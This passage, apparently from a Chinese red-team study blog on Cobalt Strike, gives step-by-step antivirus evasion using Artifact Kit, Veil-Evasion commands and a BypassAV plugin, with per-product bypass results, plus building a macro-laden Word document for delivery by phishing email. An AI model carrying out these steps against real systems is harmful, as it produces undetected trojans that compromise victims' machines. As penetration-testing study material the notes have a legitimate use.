会生成可执行文件和DLL，它们通过命名管道为自己提供shellcode。如果防病毒沙箱不能模拟命名管道，它将找不到已知的恶意 shellcode。</p> <p>Artifact Kit 的使用步骤大概如下：</p> <p>1、下载 Artifact Kit</p> <p>2、如果需要的话就修改/混淆病毒文件</p> <p>3、构建</p> <p>4、使用 Artifact Kit 加载脚本</p> <h3 id="artifact-kit">Artifact Kit <a href="#artifact-kit" class="header-anchor">#</a></h3> <p>首先来看看未进行免杀处理的效果，这里采用 <a href="https://www.virustotal.com" target="_blank" rel="noopener noreferrer">virustotal<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a> 进行检测，发现被 42 个引擎检测到。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs25-6.png" alt=""></p> <p>接下来就试试 Artifact Kit 进行免杀的效果，有条件的可以去官网下载支持一下正版。</p> <p>当然 Github 上也有人上传了，项目地址：<a href="https://github.com/Cliov/Arsenal" target="_blank" rel="noopener noreferrer">https://github.com/Cliov/Arsenal<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p>这里使用 Artifact Kit 中的 dist-peek 方法进行测试。</p> <p>来到 Cobalt Strike 下打开 <code>Cobalt Strike -&gt; Script Manager</code>，Load 加载 <code>/Arsenal/artifact/dist-peek/artifact.cna</code> 插件，之后在 <code>Attacks -&gt; Packages -&gt; Windows Executable</code> 中生成木马文件。</p> <p>使用 VT 检测发现仅有 8 个引擎检测到，感觉效果好像还行。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs25-9.png" alt=""></p> <p>把每个杀软的病毒库升级到最新后，实测可以过腾讯电脑管家、火绒，但 360 安全卫士 、 360 杀毒不行。</p> <blockquote><p>说句题外话，至于为什么用了两款 360 的产品，主要就是为了截图好看些。</p></blockquote> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs25-10.png" alt=""></p> <h3 id="veil-evasion">Veil Evasion <a href="#veil-evasion" class="header-anchor">#</a></h3> <p>此外，也可以使用 Veil Evasion 框架，Veil Evasion 的安装也是比较简单的，Veil-Evasion 在 Kali 2020以前是自带的，但 Kali 2020 中是需要独立安装的。在 Kali 中可以直接使用 apt-get 进行安装。</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>git config --global http.proxy 'socks5://127.0.0.1:1080'
git config --global https.proxy 'socks5://127.0.0.1:1080'

apt-get install veil-evasion
veil
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><p>其他系统可以使用 veil-evasion 项目中的介绍进行安装，项目地址：<a href="https://github.com/Veil-Framework/Veil-Evasion" target="_blank" rel="noopener noreferrer">https://github.com/Veil-Framework/Veil-Evasion<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p>由于 Veil Evasion 有 200 多 M ，因此建议挂上代理进行下载安装。</p> <p>安装完成之后，在 Cobalt Strike 里的 <code>Attacks -&gt; Packages -&gt; Payload Generator</code>  中选择 Veil 输出生成一个 payload.txt 文件</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs25-1.png" alt=""></p> <p>随后来到 Kali 下，输入 <code>veil</code> 启动，输入 <code>use Evasion</code> 使用 Evasion 工具，<code>list</code> 查看当前可用的 Payload</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>veil
use Evasion
list
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br></div></div><p>这里使用第 17 个即 <code>go/shellcode_inject/virtual.py</code> Payload 作为示例，因为 go、c 等编译性语言语言相对于 python 等脚本语言来说免杀效果会好些。</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>use 17
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>之后输入 <code>generate</code>，选择第三项 <code>Custom shellcode string</code> ，粘贴刚生成的 payload.txt 文本内容，输入要生成的 exe 文件名，即可生成一个免杀木马。</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>generate
3
粘贴 payload.txt 内容
bypass_go	#生成文件的名称
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br></div></div><p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs25-4.png" alt=""></p> <p>使用 virustotal 查杀了一下生成的 bypass_go.exe，发现被 40 个引擎检测到，不得不说这效果很一般。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs25-5.png" alt=""></p> <p>实测可以过360 安全卫士、 360 杀毒，但腾讯电脑管家、火绒不行。</p> <blockquote><p>看到 VT 的检测结果后，我还以为四款杀软都能检测到呢，没想到啊。</p></blockquote> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs25-11.png" alt=""></p> <h3 id="免杀插件">免杀插件 <a href="#免杀插件" class="header-anchor">#</a></h3> <p>后来又在 GitHub 上发现一款免杀插件，2 个月前更新的，项目地址：<a href="https://github.com/hack2fun/BypassAV" target="_blank" rel="noopener noreferrer">https://github.com/hack2fun/BypassAV<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p>使用方法可以参考项目中的介绍，目前效果感觉还是可以的，在 virustotal 上只被 10 个引擎检测到。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs25-7.png" alt=""></p> <p>实测可以过 360 安全卫士、360 杀毒、腾讯电脑管家，但火绒不行。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs25-8.png" alt=""></p> <p>在测试完成之后，开始体会到为什么要判断目标使用了哪款杀软的目的了，就上面测试的情况来说，每一家都出现未检测到的情况。在实际的环境中，还是要根据目标的具体情况具体分析。</p> <blockquote><p>Emm，浏览器首页又被 360 改成 360 导航了。</p> <p>另外不得不说一句，从使用的角度来说，火绒是这里面最乖的，没有其他杀毒软件那么多花花肠子。</p></blockquote> <p><strong>补充</strong></p> <p>进行云查杀的一些情况：</p> <p>1、首先判断文件是否为正常文件</p> <p>2、如果判断为可疑文件，则把文件的 hash 上传到云上</p> <p>3、同时把这个文件标记为可疑文件，而不是正常文件</p> <p>因此可以通过修改我们的脚本来使其跳过云查杀，就像是在白名单里的程序一样。</p> <h3 id="java-applet">Java Applet <a href="#java-applet" class="header-anchor">#</a></h3> <p>接下来一起来看看 Cobalt Strike Java Applet 攻击，在 Cobalt Strike 的源码中内置了用于攻击 Java Applet 签名的 Applet 工具。</p> <p>使用 Applet 工具的步骤如下：</p> <p>1、到 <code>Help -&gt; Arsenal</code></p> <p>2、如果需要的话就修改/混淆病毒文件</p> <p>3、使用代码签名证书进行签名</p> <p>4、构建</p> <p>5、使用 Applet Kit 加载脚本</p> <p>大概在 2014 年 7 月，开始有人在钓鱼中使用宏攻击，在几年前，这是一种效果还很不错的攻击方式。</p> <h2 id="_3、应用白名单">3、应用白名单 <a href="#_3、应用白名单" class="header-anchor">#</a></h2> <p>站在防御者的角度，一个好的防御应该是列出只允许自己运行的应用程序白名单而不允许他人运行。对于攻击者则是使用白名单应用程序将代理放到内存中的方法来进行攻击，Java Applet 攻击就是这样做的。</p> <p>一种攻击的方法是直接插入内存进行攻击。Java Applet、Office 宏、CS 下的 PowerShell 命令行都是这样做的。</p> <p>一些白名单免杀的资料：</p> <p><a href="https://twitter.com/subTee" target="_blank" rel="noopener noreferrer">https://twitter.com/subTee<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><a href="https://github.com/khr0x40sh/WhiteListEvasion" target="_blank" rel="noopener noreferrer">https://github.com/khr0x40sh/WhiteListEvasion<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <h3 id="白名单申请">白名单申请 <a href="#白名单申请" class="header-anchor">#</a></h3> <p>Win + R 打开运行窗口，输入 <code>gpedit.msc</code> ，来到 <code>用户配置 -&gt; 管理模板 -&gt; 系统</code> 处，打开 <code>只允许指定的 Windows 程序</code></p> <p>在打开的窗口中，勾选<code>已启用</code>，之后点击<code>显示</code>按钮，在其中写入白名单的程序名称后，点击两次确定之后即可。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs28-1.png" alt=""></p> <h2 id="_4、宏攻击">4、宏攻击 <a href="#_4、宏攻击" class="header-anchor">#</a></h2> <p>在 Cobalt Strike 客户端上，选择 <code>Packages --&gt; MS Office Macro</code>，指定一个监听器，点击 <code>Generate</code>，之后根据提示的步骤生成一个 Word 文档。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs28-2.png" alt=""></p> <p>大体的步骤如下：</p> <p>1、打开 Microsoft Word 或者 Excel</p> <p>2、来到 <code>视图 --&gt; 宏</code></p> <p>3、任意填写一个宏的名称</p> <p>4、宏的位置选择为当前文档</p> <p>5、点击创建</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs28-3.png" alt=""></p> <p>6、在打开的编辑器中，删除掉原来的内容</p> <p>7、点击 Cobalt Strike 上的 <code>Copy Macro</code> 按钮</p> <p>8、将刚复制 Cobalt Strike 生成的内容粘贴到打开的编辑器中</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs28-4.png" alt=""></p> <p>9、关闭编辑器</p> <p>10、将文档保存为启用宏的文档，这里可以选择保存为 <code>启用宏的 Word 文档</code> 或者 <code>Word 97-2003 文档</code></p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs28-5.png" alt=""></p> <p>接下来使用钓鱼邮件等方式上传到靶机，当靶机运行该文档后启用宏内容即可上线。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs28-6.png" alt=""></p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs28-7.png" alt=""></p> <blockquote><p>这里不得不吐槽一句，Microsoft Office 的东西安装是真的麻烦。</p></blockquote> <p>在上面 2-8 步骤创建编辑宏内容的过程，也可以打开 <code>开发工具 --&gt; Visual Basic</code> 界面，这里推荐使用快捷键<code>Alt+F11</code>打开该界面。</p> <p>之后编辑<code>ThisDocument</code> 模块，粘贴宏代码也可以达到上述 2-8 步的效果。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs28-8.png" alt=""></p> <h1 id="_0x10-总结">0x10 总结 <a href="#_0x10-总结" class="header-anchor">#</a></h1> <p>感谢 Cobalt Strike 的作者 <code>Raphael Mudge</code> 的课程，感谢 UP <code>Hack 学习呀</code> 上传的中文翻译版本，感谢 <code>A-Team</code> 团队的 Cobalt Strike 4.0 中文翻译手册，感谢每篇笔记最后参考链接的作者们，感谢曾经帮助我解决所碰到问题的大佬们，谢谢你们。</p> <h1 id="参考资料">参考资料 <a href="#参考资料" class="header-anchor">#</a></h1> <blockquote><p><a href="https://teamssix.com/year/201023-192553.html" target="_blank" rel="noopener noreferrer">https://teamssix.com/year/201023-192553.html<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><a href="https://xz.aliyun.com/t/3975" target="_blank" rel="noopener noreferrer">https://xz.aliyun.com/t/3975<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><a href="https://payloads.online/tools/socat" target="_blank" rel="noopener noreferrer">https://payloads.online/tools/socat<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><a href="https://zhuanlan.zhihu.com/p/93718885" target="_blank" rel="noopener noreferrer">https://zhuanlan.zhihu.com/p/93718885<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><a href="https://www.anquanke.com/post/id/156299" target="_blank" rel="noopener noreferrer">https://www.anquanke.com/post/id/156299<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><a href="https://www.bilibili.com/video/BV16b411i7n5" target="_blank" rel="noopener noreferrer">https://www.bilibili.com/video/BV16b411i7n5<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><a href="https://www.freebuf.com/sectool/173366.html" target="_blank" rel="noopener noreferrer">https://www.freebuf.com/sectool/173366.html<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><a href="https://my.oschina.net/u/4300698/blog/3382230" target="_blank" rel="noopener noreferrer">https://my.oschina.net/u/4300698/blog/3382230<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><a href="https://segmentfault.com/a/1190000019290085" target="_blank" rel="noopener noreferrer">https://segmentfault.com/a/1190000019290085<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><a href="https://www.cnblogs.com/cthon/p/9151467.html" target="_blank" rel="noopener noreferrer">https://www.cnblogs.com/cthon/p/9151467.html<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><a href="https://www.secpulse.com/archives/127186.html" target="_blank" rel="noopener noreferrer">https://www.secpulse.com/archives/127186.html<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><a href="https://www.freebuf.com/articles/web/231892.html" target="_blank" rel="noopener noreferrer">https://www.freebuf.com/articles/web/231892.html<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><a href="https://klionsec.github.io/2017/09/23/cobalt-strike/" target="_blank" rel="noopener noreferrer">https://klionsec.github.io/2017/09/23/cobalt-strike/<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><a href="https://www.renfei.org/blog/introduction-to-spf.html" target="_blank" rel="noopener noreferrer">https://www.renfei.org/blog/introduction-to-spf.html<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><a href="https://www.cnblogs.com/backlion/p/10616308.html" target="_blank" rel="noopener noreferrer">https://www.cnblogs.com/backlion/p/10616308.html<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><a href="https://blog.csdn.net/hnjztyx/article/details/52910478" target="_blank" rel="noopener noreferrer">https://blog.csdn.net/hnjztyx/article/details/52910478<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><a href="http://blog.leanote.com/post/snowming/62ec1132a2c9" target="_blank" rel="noopener noreferrer">http://blog.leanote.com/post/snowming/62ec1132a2c9<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><a href="https://blog.csdn.net/pipisorry/article/details/52269785" target="_blank" rel="noopener noreferrer">https://blog.csdn.net/pipisorry/article/details/52269785<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><a href="https://blog.csdn.net/l1028386804/article/details/86675559" target="_blank" rel="noopener noreferrer">https://blog.csdn.net/l1028386804/article/details/86675559<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><a href="https://www.freebuf.com/company-information/167460.html" target="_blank" rel="noopener noreferrer">https://www.freebuf.com/company-information/167460.html<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><a href="https://blog.csdn.net/qq_34101364/article/details/108062913" target="_blank" rel="noopener noreferrer">https://blog.csdn.net/qq_34101364/article/details/108062913<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" 